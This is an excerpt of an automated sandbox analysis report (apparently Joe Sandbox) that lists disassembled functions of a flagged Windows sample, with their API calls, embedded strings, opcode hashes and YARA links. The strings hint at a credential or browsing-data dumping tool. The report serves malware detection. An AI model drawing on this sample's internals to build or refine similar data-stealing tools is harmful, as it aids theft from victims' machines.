                                                              Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf$memset$wcscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 2000436516-3842416460
                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                              Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1043902810-0
                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                              • free.MSVCRT ref: 0040E49A
                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                              • API String ID: 3849927982-2252543386
                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A47B
                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • out of memory, xrefs: 0042F865
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • database is already attached, xrefs: 0042F721
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
